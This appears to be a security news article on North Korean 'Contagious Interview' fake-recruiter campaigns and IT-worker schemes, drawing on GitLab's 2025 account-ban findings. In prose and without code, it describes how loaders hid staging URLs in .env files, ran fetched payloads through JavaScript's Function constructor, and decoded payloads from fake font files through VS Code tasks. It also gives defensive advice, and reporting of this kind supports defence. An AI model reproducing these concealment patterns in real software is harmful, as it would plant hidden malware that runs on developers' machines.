North Korean nation-state threat actors have been conducting a two-pronged operation in which they embed fictitious employees inside legitimate businesses while posing as recruiters. Since at least 2022, these actors have used the malware families BeaverTail and OtterCookie to deceive software developers into executing malicious code during fictitious technical interviews. This has allowed them to steal credentials, take over devices remotely, and commit identity and financial theft.

Known to the public as Contagious Interview, the campaign has affected thousands of developers and is still expanding. On professional networking sites, threat actors create believable recruiter profiles and instruct targets to execute code while posing as technical tasks. The malware runs silently in the background once the victim launches the project.

Separate North Korean agents have also infiltrated Western tech firms as phony workers, obtaining salaries that are purportedly used to support the government. In 2025, 131 GitLab.com accounts linked to these North Korean malware distribution campaigns were found and banned by GitLab analysts. With an average of 11 account bans per month, activity peaked in September.

According to analysts, in more than 80% of cases, actors placed a hidden loader that retrieved payloads from outside services like Vercel rather than storing the malware directly on GitLab, making it much more difficult for defenders to detect. Distribution of staging infrastructure on GitLab.com for North Korean nation-state malware activity in 2025 (Source: GitLab) The IT worker scheme's financial scale is equally concerning.

Analysts discovered a private repository that belonged to Kil-Nam Kang, a cell manager who supervised seven North Korean agents working out of Beijing. According to financial records, the cell developed software as a freelancer using stolen or fake identities, earning over US$1.64 million between Q1 2022 and Q3 2025. Execution of Malware and Strategies for Concealment In 2025, the most prevalent execution pattern dispersed malicious code throughout several project files, making it simple to overlook even with a thorough code review.

Under the guise of a standard configuration variable, threat actors encoded a staging URL inside a.env file.

A trigger function retrieved remote content and sent it to a custom error handler that made use of JavaScript's Function when the developer executed the project.To run the downloaded payload as live code, use the constructor method. Another line of defense against analysis was provided by staging URLs, which returned fake content unless the proper request headers were included. Distribution of North Korean nation-state malware features and activity on GitLab.com in 2025 (Source: GitLab) Analysts noticed a new cluster in December 2025 that was using VS Code task configurations to execute malware and decode hidden payloads from phony font files.

Employers should be wary of candidates who have broken links to their code portfolios or professional profiles. During technical screening, developers should refrain from executing unknown code from unidentified contacts.

To receive more immediate updates, set ZeroOwl as a preferred source in Google and keep an eye out for encoded values in.env files and unexpected outbound requests that are triggered at application startup.